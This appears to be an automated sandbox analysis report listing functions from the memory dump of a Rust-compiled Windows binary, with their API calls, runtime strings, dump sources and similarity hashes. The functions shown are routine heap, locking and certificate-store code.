Function 00007FF7BF725760, Relevance: 19.9, APIs: 10, Strings: 3, Instructions: 425memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72585E
HeapFree.KERNEL32 ref: 00007FF7BF72586B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BF725F5A), ref: 00007FF7BF725A58
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BF725F5A), ref: 00007FF7BF725A90

Part of subcall function 00007FF7BF71B1A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7BF725D03,?,?,?,?,?,?,?,?), ref: 00007FF7BF71B1D6

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF7259E8, 00007FF7BF725DCA
already borrowed, xrefs: 00007FF7BF725AAE
alibrary\std\src\io\stdio.rs, xrefs: 00007FF7BF7258DF

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalHeapSection$EnterErrorFreeLastLeaveProcess
String ID: alibrary\std\src\io\stdio.rs$already borrowed$called `Option::unwrap()` on a `None` value
API String ID: 168510772-570499286
Opcode ID: 4bf8a389407aa76cdc75b91b31c6a5a0c45bf10717d4e281cfa9caa844d9e68d
Instruction ID: 7e4b9584d9dbde89d44f5dfa806176f2c02f85d008bbbdf1059451d8f4a13584
Opcode Fuzzy Hash: 4bf8a389407aa76cdc75b91b31c6a5a0c45bf10717d4e281cfa9caa844d9e68d
Instruction Fuzzy Hash: C5F1D326A086C181FA20AB99A9442F9E751EB6FF94FC49175DF8D07B8DDE3CE5818310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7266B0, Relevance: 18.2, APIs: 11, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72671B
HeapAlloc.KERNEL32 ref: 00007FF7BF72672B
GetProcessHeap.KERNEL32 ref: 00007FF7BF726751
HeapAlloc.KERNEL32 ref: 00007FF7BF726761
GetProcessHeap.KERNEL32 ref: 00007FF7BF726780
HeapAlloc.KERNEL32 ref: 00007FF7BF726790
GetProcessHeap.KERNEL32 ref: 00007FF7BF7267F5
HeapFree.KERNEL32 ref: 00007FF7BF726802
LeaveCriticalSection.KERNEL32 ref: 00007FF7BF72683E
GetProcessHeap.KERNEL32 ref: 00007FF7BF7268E2
HeapFree.KERNEL32 ref: 00007FF7BF7268EF

Strings

formatter error, xrefs: 00007FF7BF726747

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free$CriticalLeaveSection
String ID: formatter error
API String ID: 987588952-3172192836
Opcode ID: 77e749b40de5afb5fcd022860b08c14ab0f7542b3c9de4e7d125e212c07d4f87
Instruction ID: 7df0c216424afd74e97105dbbdb6c6c0ff6fc34dad473bbeb5b1740e6bc02dd2
Opcode Fuzzy Hash: 77e749b40de5afb5fcd022860b08c14ab0f7542b3c9de4e7d125e212c07d4f87
Instruction Fuzzy Hash: 0D61D916A086C541F721B759E8102E9E791EB9AF80FC59075DF8D0779DDE3CE541C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF725480, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 205memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 00007FF7BF725491
GetProcessHeap.KERNEL32 ref: 00007FF7BF7254AC
HeapAlloc.KERNEL32 ref: 00007FF7BF7254BC
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF7BF725552
TryEnterCriticalSection.KERNEL32 ref: 00007FF7BF725638
GetProcessHeap.KERNEL32 ref: 00007FF7BF7256A6
HeapFree.KERNEL32 ref: 00007FF7BF7256B3
GetProcessHeap.KERNEL32 ref: 00007FF7BF7256CC
HeapFree.KERNEL32 ref: 00007FF7BF7256D9

Strings

already borrowed, xrefs: 00007FF7BF725734

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$ExclusiveFreeLock$AcquireAllocCriticalEnterReleaseSection
String ID: already borrowed
API String ID: 1223081254-4122307393
Opcode ID: b2308e90facd022aaffcde695b67f387e8c6492dd6f6a6b5e7ac8de28fd2280b
Instruction ID: 5ceedfadcc7337d5419c3374de3fdee937f75f81120dfbc4a4db48c59a2086aa
Opcode Fuzzy Hash: b2308e90facd022aaffcde695b67f387e8c6492dd6f6a6b5e7ac8de28fd2280b
Instruction Fuzzy Hash: 4081B626A0868542F725AB59E5403F9E252EBAAF94FD05131DB5D07B98DF3CE491C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7214F0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 00007FF7BF7214FD
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF7BF721586
GetProcessHeap.KERNEL32 ref: 00007FF7BF721671
HeapFree.KERNEL32 ref: 00007FF7BF72167E

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXES, xrefs: 00007FF7BF721595

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveHeapLock$AcquireFreeProcessRelease
String ID: assertion failed: key != c::TLS_OUT_OF_INDEXES
API String ID: 1551148922-1549602911
Opcode ID: ef679cf656f9aff8362423c15b3e5f463f0b961f057dd398b7f97b16e76ee55e
Instruction ID: 6b38123b63dde5e834da8630d1a704ff8f4cedd7712f4c0eec0e8fcebc00d3bb
Opcode Fuzzy Hash: ef679cf656f9aff8362423c15b3e5f463f0b961f057dd398b7f97b16e76ee55e
Instruction Fuzzy Hash: 8031AF29A199C241FA11BB99A9057F8A252BFAAFE0FC44170DB5C037DDDE3CE4428320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF71ACD0, Relevance: 15.2, APIs: 9, Strings: 1, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF71AD26
HeapAlloc.KERNEL32 ref: 00007FF7BF71AD36
GetProcessHeap.KERNEL32 ref: 00007FF7BF71AD5C
HeapAlloc.KERNEL32 ref: 00007FF7BF71AD6C
GetProcessHeap.KERNEL32 ref: 00007FF7BF71AD8B
HeapAlloc.KERNEL32 ref: 00007FF7BF71AD9B
GetProcessHeap.KERNEL32 ref: 00007FF7BF71AE00
HeapFree.KERNEL32 ref: 00007FF7BF71AE0D
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7BF71AEC3

Strings

formatter error, xrefs: 00007FF7BF71AD52

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID: formatter error
API String ID: 1864747095-3172192836
Opcode ID: cd5b8d9cf461921fdb78c72ce137a056e596e1f7cdf7a127db57adf558c4e220
Instruction ID: 9c303f48aa923730847f91aae3a066fcba4087e99a08f35d507e08635af3633f
Opcode Fuzzy Hash: cd5b8d9cf461921fdb78c72ce137a056e596e1f7cdf7a127db57adf558c4e220
Instruction Fuzzy Hash: 7B51D416A08AC541FB25BB59E4412F9E3A1EF9AF80FC49071EB8D0779DDE3CE5968310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF720CF0, Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF720D46
HeapAlloc.KERNEL32 ref: 00007FF7BF720D56
GetProcessHeap.KERNEL32 ref: 00007FF7BF720D7C
HeapAlloc.KERNEL32 ref: 00007FF7BF720D8C
GetProcessHeap.KERNEL32 ref: 00007FF7BF720DAB
HeapAlloc.KERNEL32 ref: 00007FF7BF720DBB
GetProcessHeap.KERNEL32 ref: 00007FF7BF720E20
HeapFree.KERNEL32 ref: 00007FF7BF720E2D

Strings

formatter error, xrefs: 00007FF7BF720D72

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID: formatter error
API String ID: 1864747095-3172192836
Opcode ID: 89e17320cfdc4b6bf79c1064412e5a9966342c25830953e35b146282fcf1379e
Instruction ID: 3f39bff8c06c894eb090ee06917b5cb17abfaf6e66d32f2624bb84bfecef1472
Opcode Fuzzy Hash: 89e17320cfdc4b6bf79c1064412e5a9966342c25830953e35b146282fcf1379e
Instruction Fuzzy Hash: 8241F615A096C641FB257B5DE8112F9A391EBAAF80FC49075EB8C0779EDE3CE5818320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72A3D0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32 ref: 00007FF7BF72A413
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF7BF72A4AB
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF7BF72A4E8
GetLastError.KERNEL32 ref: 00007FF7BF72A516
GetLastError.KERNEL32 ref: 00007FF7BF72A536

Strings

called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs, xrefs: 00007FF7BF72A559
attempt to divide by zero, xrefs: 00007FF7BF72A4FC

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExclusiveLastLock$AcquireFrequencyPerformanceQueryRelease
String ID: attempt to divide by zero$called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs
API String ID: 4170693517-1498070664
Opcode ID: c5dced705bc9ef9b829383f8bb6fa690fea9a789bf5af67ec1baba770c26d8f4
Instruction ID: 4665330f2ef7df9ec57526739622047c586a53501177ecf642f761f912e6c967
Opcode Fuzzy Hash: c5dced705bc9ef9b829383f8bb6fa690fea9a789bf5af67ec1baba770c26d8f4
Instruction Fuzzy Hash: 3941C425B186CA42FA54EB8DAC443E5E295EFAAF80FC44031DA4D47BACDF3CE4558760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF725AD0, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF725E58
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF725ECE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF725F3D
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF725F7D

Part of subcall function 00007FF7BF71B1A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7BF725D03,?,?,?,?,?,?,?,?), ref: 00007FF7BF71B1D6

EnterCriticalSection.KERNEL32 ref: 00007FF7BF725FF3
LeaveCriticalSection.KERNEL32 ref: 00007FF7BF72600F

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF7259E8, 00007FF7BF725DCA, 00007FF7BF725F0B, 00007FF7BF725FBB
already borrowed, xrefs: 00007FF7BF725AAE, 00007FF7BF725EEC, 00007FF7BF725F9C

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID: already borrowed$called `Option::unwrap()` on a `None` value
API String ID: 486337731-772495492
Opcode ID: f462d7577887d192f052c42109d17c24fb775c46439fcad4c29514317d70216c
Instruction ID: 20ea432e1916e7ed46965b8d4d9d70d4c2abd55037fffb6f9884117e7899b08c
Opcode Fuzzy Hash: f462d7577887d192f052c42109d17c24fb775c46439fcad4c29514317d70216c
Instruction Fuzzy Hash: E1C1E426E086C681FA20EB99A9442F9A351EB6FF94FC45171DF4D07B9DDE3CE5828310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF673CD6, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 356encryptionCOMMON

Download Yara Rule

APIs

CertDuplicateCertificateContext.CRYPT32 ref: 00007FF7BF673D73
CertOpenStore.CRYPT32 ref: 00007FF7BF673D95
CertFreeCertificateContext.CRYPT32 ref: 00007FF7BF673DFF
CertFreeCertificateContext.CRYPT32 ref: 00007FF7BF673EAD

Strings

httphttpswswssfile//, xrefs: 00007FF7BF6744DC
Z, xrefs: 00007FF7BF674223

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Cert$CertificateContext$Free$DuplicateOpenStore
String ID: Z$httphttpswswssfile//
API String ID: 3431705244-3984234775
Opcode ID: 69d8f3fbd07597bfb6724df96e41f55ff82d23f986e68ea79ca7de986bb8b6ce
Instruction ID: a8652170e2aa3cdbdfeb8ce2f15dd96461b2f52b9b5b873dd5fb46a79868841d
Opcode Fuzzy Hash: 69d8f3fbd07597bfb6724df96e41f55ff82d23f986e68ea79ca7de986bb8b6ce
Instruction Fuzzy Hash: 4922363650CBC185E271AB18E0413EEB7A5FBAAB48F449225DFC803B5ADF39D195CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7195D0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 00007FF7BF719661
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF7BF71968A
GetProcessHeap.KERNEL32 ref: 00007FF7BF71968F
HeapAlloc.KERNEL32 ref: 00007FF7BF71969F

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF7196E5
failed to generate unique thread ID: bitspace exhausted, xrefs: 00007FF7BF7196CB

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveHeapLock$AcquireAllocProcessRelease
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 2353542611-1657987152
Opcode ID: 0ccec63ad804945c3758a8ef6502c8dc83c9342955737312fcac6fe8bb2e6f89
Instruction ID: de3c165e550c45d4085c6ca2b24b9d651755cafa7add907140df96f061ebf5ce
Opcode Fuzzy Hash: 0ccec63ad804945c3758a8ef6502c8dc83c9342955737312fcac6fe8bb2e6f89
Instruction Fuzzy Hash: 8D41B525A08AC241FA11BB98E8002F9E2A2EFAAF90FC44175D74D076DDDF3CE556C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72A850, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72A96A
HeapFree.KERNEL32 ref: 00007FF7BF72A977

Strings

RUST_MIN_STACK, xrefs: 00007FF7BF72A870

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID: RUST_MIN_STACK
API String ID: 3859560861-1222364765
Opcode ID: fac668b5d808b2ef28cfc774e9eeffc7a30f43067815f85935fb3cfa763beb6c
Instruction ID: 2fff42e83ee87b5e625564da5b189aa14143fcb1c7702bca90445e9b32a782a4
Opcode Fuzzy Hash: fac668b5d808b2ef28cfc774e9eeffc7a30f43067815f85935fb3cfa763beb6c
Instruction Fuzzy Hash: 6C31C519B0D68240FE65A58E5A102F4D342DF6BFE0FC985B1CB9D86ACDED2DE5428320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF723C20, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

., xrefs: 00007FF7BF723D43

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: cc4f5d2157888fbe0f700fa37fc036b640c233b6d82e6a56292bb1226f4d0cc1
Instruction ID: 548c269c6641ecf1933034f072d56f8ea75b5fd9d677a39ff404f9da9a7dbdf2
Opcode Fuzzy Hash: cc4f5d2157888fbe0f700fa37fc036b640c233b6d82e6a56292bb1226f4d0cc1
Instruction Fuzzy Hash: 43519526D186C182E7B06B99D8403F9E3A0FB6AB44FC49571DF8D03699EF7CE5A18710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF721E80, Relevance: 6.4, APIs: 5, Instructions: 182memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF721FA8
HeapFree.KERNEL32 ref: 00007FF7BF721FB5
GetProcessHeap.KERNEL32 ref: 00007FF7BF721FE7
HeapAlloc.KERNEL32 ref: 00007FF7BF721FF7
GetProcessHeap.KERNEL32 ref: 00007FF7BF7220CE

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: ab7f4565d2d3796365073a66fa1a01d2ebaf4b798871b5dd6be2b01c6edfc954
Instruction ID: 123dc8d9fec52fee278ca80e99e30b860c6afdcf0f4ef91b70010b2c9aaa1fde
Opcode Fuzzy Hash: ab7f4565d2d3796365073a66fa1a01d2ebaf4b798871b5dd6be2b01c6edfc954
Instruction Fuzzy Hash: 4D719726918BC581E7219B5DE4402E9E371FBA9B88F949131EF8C13769EF78E2D1C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF721370, Relevance: 6.4, APIs: 5, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF7BF721393
GetProcessHeap.KERNEL32(?,?,?,?,?,?,FFFFFFFB,?,?,?,00007FF7BF71A3B3), ref: 00007FF7BF72139D
HeapAlloc.KERNEL32(?,?,?,?,?,?,FFFFFFFB,?,?,?,00007FF7BF71A3B3), ref: 00007FF7BF7213AD
TlsSetValue.KERNEL32(?,?,?,?,?,?,FFFFFFFB,?,?,?,00007FF7BF71A3B3), ref: 00007FF7BF7213E6
TlsGetValue.KERNEL32 ref: 00007FF7BF7213FF

Part of subcall function 00007FF7BF7214F0: AcquireSRWLockExclusive.KERNEL32 ref: 00007FF7BF7214FD

Part of subcall function 00007FF7BF67B880: GetProcessHeap.KERNEL32 ref: 00007FF7BF67B96A
Part of subcall function 00007FF7BF67B880: HeapAlloc.KERNEL32 ref: 00007FF7BF67B977

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Value$AllocProcess$AcquireExclusiveLock
String ID:
API String ID: 1969458017-0
Opcode ID: 29f2aaac19bd2bf157d5c3c8c2496aecb6a4afc4a12e2bfa985c0d29b0c4e797
Instruction ID: 475326ad8ac12fafcfb7287e3bd646d16cc57b4348b716cc8bfe6ef299f4e4aa
Opcode Fuzzy Hash: 29f2aaac19bd2bf157d5c3c8c2496aecb6a4afc4a12e2bfa985c0d29b0c4e797
Instruction Fuzzy Hash: 3531A426B196C641FE55BB99E8503B9A251EBABF84FC08075DF4D0778DDE7CE4418310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72AFD0, Relevance: 6.3, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72B02A
HeapFree.KERNEL32 ref: 00007FF7BF72B037

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2ff08acfdddabc758acaaed06cd395c73237bd5ce9bfc8f58f7b60daa31912fe
Instruction ID: 66cc3b3965289c8401c16eb7062aa60d77af9ece0c259cd0c150f0e8f53856e0
Opcode Fuzzy Hash: 2ff08acfdddabc758acaaed06cd395c73237bd5ce9bfc8f58f7b60daa31912fe
Instruction Fuzzy Hash: BE11B259B185C241FA72B69A5A006F5D481AF6BFD0FC48174EFAC57BCEEC3DD5418120

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67B510, Relevance: 6.3, APIs: 5, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,00007FF7BF67D990), ref: 00007FF7BF67B529
GetProcessHeap.KERNEL32(?,?,?,?,00007FF7BF67D990), ref: 00007FF7BF67B555
HeapAlloc.KERNEL32(?,?,?,?,00007FF7BF67D990), ref: 00007FF7BF67B565
GetProcessHeap.KERNEL32(?,?,?,?,00007FF7BF67D990), ref: 00007FF7BF67B599
HeapFree.KERNEL32(?,?,?,?,00007FF7BF67D990), ref: 00007FF7BF67B5A7

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: adf859254c65c8c51b53dd47ba234e23b6193a63f86d0e0ff968d6ef099001be
Instruction ID: 635b439c5cf785e76a68b3d97bb1c68b5898b33ab9e4318b9180b9e9c82a9026
Opcode Fuzzy Hash: adf859254c65c8c51b53dd47ba234e23b6193a63f86d0e0ff968d6ef099001be
Instruction Fuzzy Hash: 0301D656B1A19102F615F6EB29014E8A5816F9AFE0BC58475EF5C177CEFD3C95838220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72A580, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 130COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,00000001,?,?,00000000,00007FF7BF72A80B), ref: 00007FF7BF72A70B

Strings

called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs, xrefs: 00007FF7BF72A72E
